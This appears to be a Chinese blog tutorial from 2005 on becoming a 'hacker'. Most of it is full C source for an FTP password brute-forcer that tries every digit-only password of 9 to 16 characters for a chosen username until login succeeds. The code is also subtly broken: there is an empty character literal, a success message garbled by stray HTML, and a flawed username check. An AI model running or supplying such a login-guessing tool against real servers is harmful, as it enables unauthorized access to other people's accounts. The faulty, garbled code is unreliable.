模板
教程
环境
性能
功能
管理
hacker成长的代码之路:穷举(2)
转载请保留原作者信息,谢谢。
要求的专业知识:
一: 精通OSI参考模型,精通网络五层:物理层,数据链路层,网络层,传输层,应用层。
精通每一层的协议,数据报格式。精通网络拓扑结构,第一层,第二层,第三层的网
络互联,数据的转发和路由等。
二: 精通C语言程序设计,UNIX/LINUX程序设计,网络程序设计。熟悉UNIX/LINUX系
统操作,熟悉著名服务的基本配置,特性及使用的端口号。熟悉经典网络命令的使用,
如:netstat,ping,traceroute,netcat,arp等。
三: 精通标准SQL语言,熟悉流行的数据库使用,如:Oracle,Mysql等。掌握数据库与
WEB语言的结合使用。
昨天说了穷举算法,今天就用它来做一个可以用的程序,FTP穷举。
如果读者你看过FTP源码,或在别的书上看到过FTP源码介绍,就应该知道,FTP命令
和应答都以"\r\n"结尾,知道这一点是重要的。
我想只是写一个示例性的程序,也就没有考滤它的实用了。所以用一个socket,与FTP
服务器建立连接,然后用穷举得到的密码序列,依次尝试LOGIN,直到成功。
程序没有什么技巧,只要了解FTP返回码的含义就可。都是331,230,550等。
用到了getopt函数,用来指定命令行参数的。
我想说:如果你想成为一个Hacker,这里指的是真正的高手,并不是那些只会用几个黑
软的不长进的类别,那么我建议你学习UNIX,现在有可得源码的linux,何乐而不用呢?
linux里有所有服务的可得的源码,读源码是长进的最好的办法。
1 /*
2 * Author: kf_701
3 * Email : kf_701@21cn.com
4 * 2005/3/21 hefei
5 * ahau.edu
6 *
7 * Introduction:
8 * 本程序主要用于 FTP密码探测,
9 * 根据给定的username,使用穷举算法
10 * 反复尝试login!
11 * 此程序仅用来学习编程之用!
12 *
13 * ***kfprobe.c***
14 */
15
16 #include<stdio.h>
17 #include<sys/socket.h>
18 #include<unistd.h>
19 #include<errno.h>
20 #include<string.h>
21 #include<sys/types.h>
22 #include<netinet/in.h>
23 #include<signal.h>
24 #include<netdb.h>
25 #include<stdlib.h>
26 #include<arpa/inet.h>
27
28 #define CMD_BUF_SIZE 255
29 #define MIN_BIT 9
30 #define MAX_BIT 16
31
32 /*basename(argv[0])*/
33 extern char *__progname;
34
35 char dict[]="1234567890";
36 int sockfd;
37
38 char cmd_buffer[CMD_BUF_SIZE +1];
39 char cmd_line[CMD_BUF_SIZE +1];
40
41 static int login(char* user, char* pass);
42 static int send_command(char* cmd);
43 static int recv_answer(int store);
44 static ssize_t my_raw_read(char* buf, size_t n, int sc);
45 static ssize_t my_raw_write(const char* buf, size_t n, int sc);
46 static void help(void);
47
48 int main(int argc,char **argv)
49 {
50 char *user="anonymous";
51 /*char *pass=0; */
52
53 struct hostent *host;
54
55 long dictcount=sizeof(dict);
56 char password[MAX_BIT+2];
57 long index[MAX_BIT];
58 long nlength=MIN_BIT;
59 register long j,i=0;
60 int b_next;
61
62 printf("kf_701 ftp password probe 1.1 ,welcome to you .\n");
63
64 /** deal with argv of main and init some variables **/
65
66 #ifndef HAVE__PROGNAME
67 __progname = argv[0];
68 #endif
69
70 int c;
71 while((c = getopt(argc,argv,"hu:")) != EOF)
72 {
73 switch(c)
74 {
75 case 'h':
76 help();
77 case 'u':
78 user=optarg;
79 break;
80 default:
81 fprintf(stderr,"%c:not implemented,type -h for help\n",c);
82 exit(1);
83 }
84 }
85 if(user == "anonymous")
86 {
87 printf("please suply a user name for login,type -h for help\n");
88 exit(0);
89 }
90 argc -= optind;
91 argv += optind;
92 if(argc != 1)
93 {
94 fprintf(stderr,"Usage: %s [options] <hostname|address>\n",__progname);
95 exit(0);
96 }
97
98 /** Create a socket and connect to server **/
99 struct sockaddr_in sa;
100 bzero(&sa,sizeof(struct sockaddr));
101 sa.sin_family = AF_INET;
102 sa.sin_port = htons(21);
103 if(inet_aton(argv[0],&sa.sin_addr) == 0)
104 {
105 host = gethostbyname(argv[0]);
106 if(host == NULL)
107 {
108 fprintf(stderr,"Hostname Error: %s \n",hstrerror(h_errno));
109 exit(1);
110 }
111 sa.sin_addr = *(struct in_addr *)(host->h_addr_list[0]);
112 }
113 sockfd = socket(AF_INET,SOCK_STREAM,0);
114 if(sockfd == -1)
115 {
116 perror("Create Socket Error");
117 exit(1);
118 }
119 if(connect(sockfd,(struct sockaddr *)&sa,sizeof(sa)) == -1)
120 {
121 perror("Connect Error");
122 exit(1);
123 }else{
124 recv_answer(0);
125 }
126
127
128 /** Create sequences from dict to try login server **/
129 while(nlength<=MAX_BIT)
130 {
131 for(i=0;i<MAX_BIT;i++)
132 index[i]=0;
133
134 b_next=1;
135 while(b_next)
136 {
137 for(i=0;i<nlength;i++)
138 password[i]=dict[index[i]];
139
140 password[i]=''; /*here we get one of sequences*/
141 printf("%s %s \n",user,password);
142 if(login(user,password)){ /*try to login*/
143 printf("Congratulations! Login suclearcase/" target="_blank" >ccessfully! \n");
144 exit(0);
145 }
146
147 for(j=nlength-1;j>=0;j--)
148 {
149 index[j]++;
150 if(index[j]!=dictcount-1)
151 break;
152 else
153 {
154 index[j]=0;
155 if(j==0)
156 b_next=0;
157 }
158 }
159 }
160 nlength++;
161 }
162
163
164 /** I am sorry ,Maybe you will do it tomorrow **/
165 printf("I am sorry,Maybe you will do it tomorrow!\n");
166 exit(0);
167 }
168
169 static int login(char* user, char* pass)
170 {
171 int rv = 0;
172 bzero(cmd_buffer,CMD_BUF_SIZE);
173 snprintf(cmd_buffer, CMD_BUF_SIZE, "USER %s\r\n", user);
174 if (send_command(cmd_buffer) != 331) return 0;
175 bzero(cmd_buffer,CMD_BUF_SIZE);
176 snprintf(cmd_buffer, CMD_BUF_SIZE, "PASS %s\r\n", pass);
177 if (send_command(cmd_buffer) == 230) rv = 1;
178 return rv;
179 }
180
181 static int send_command(char* cmd)
182 {
183 size_t len, rv = 0;
184 len = strlen(cmd);
185 if (my_raw_write(cmd, len, sockfd) < 0)
186 return 0;
187 else
188 rv = recv_answer(0);
189 return rv;
190 }
191
192 static int recv_answer(int store)
193 {
194 int code;
195 char str_code[] = { 0, 0, 0, ' ', 0 };
196 if(my_raw_read(cmd_line, CMD_BUF_SIZE,sockfd) < 3)
197 return 0;
198 strncpy(str_code, cmd_line, 3);
199 sscanf(str_code, "%i", &code);
200 return code;
201 }
202
203 static ssize_t my_raw_read(char* buf, size_t n, int sc)
204 {
205 return recv(sc, buf, n, 0);
206 }
207
208 static ssize_t my_raw_write(const char* buf, size_t n, int sc)
209 {
210 return send(sc, buf, n, 0);
211 }
212
213 static void help()
214 {
215 printf("\
216 -----------------------------------\n\
217 usage: %s [options] <hostname|address>\n\
218 -u: specify a user name for login\n\
219 -h: show this help \n\
220 ------------------------------------\n\
221 writed by kf_701 2005/3/21\n\
222 Email: kf_701@21cn.com\n\
223 -------------------------------------\n\
224 ",__progname);
225 exit(0);
226 }
*********待续**********
更多内容请进:http://blog.chinaunix.net/index.php?blogId=3063
